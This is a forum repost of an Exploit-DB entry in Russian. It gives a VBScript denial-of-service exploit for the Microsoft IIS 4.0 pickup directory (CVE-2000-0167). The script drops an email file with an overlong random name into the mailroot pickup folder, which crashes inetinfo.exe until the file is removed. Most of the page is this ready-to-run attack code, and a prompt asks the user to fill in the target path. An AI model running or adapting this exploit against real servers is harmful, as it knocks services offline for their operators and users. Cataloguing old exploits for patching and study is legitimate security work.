Exploit Microsoft IIS 4.0 - Pickup Directory Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20310
Проверка EDB
  1. Пройдено
Автор
VALENTIJN
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2000-0167
Дата публикации
2000-02-15
Код:
source: https://www.securityfocus.com/bid/1819/info

An email with a filename consisting of over 86 characters and an extension of .txt.eml will cause Microsoft IIS to crash if placed in the \mailroot\pickup directory. The process inetinfo.exe will crash, resulting in a Dr. Watson access violation error. Restarting IIS is required in order to regain normal functionality.

' PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"

Set fso = createobject("scripting.filesystemobject")
Thename = Createkey & fso.GetTempName & ".eml"
Set Thefile = fso.GetFolder(rootpath).CreateTextFile(TheName)
Thefile.writeline "X-Sender: [email protected]"
Thefile.writeline "X-Receiver: [email protected]"
Thefile.writeline "From: <[email protected]>"
Thefile.writeline "To: <[email protected]>"
Thefile.writeline "Subject: MINE DID NOT CRASH"
Thefile.writeline "Date: " & now()
Thefile.writeline "X-Generator: " & Thename
Thefile.close
Set thefile = nothing
Thename = ""

Function Createkey
for z = 1 to 80
randomize
a = Int((25 * Rnd) + 1)
password = password & chr(a+65)
next
Createkey = password
end function
' Warning IF InetInfo.exe crashes it cannot be started again as long as the
file is still there!

</example script>
 
Источник
www.exploit-db.com

Похожие темы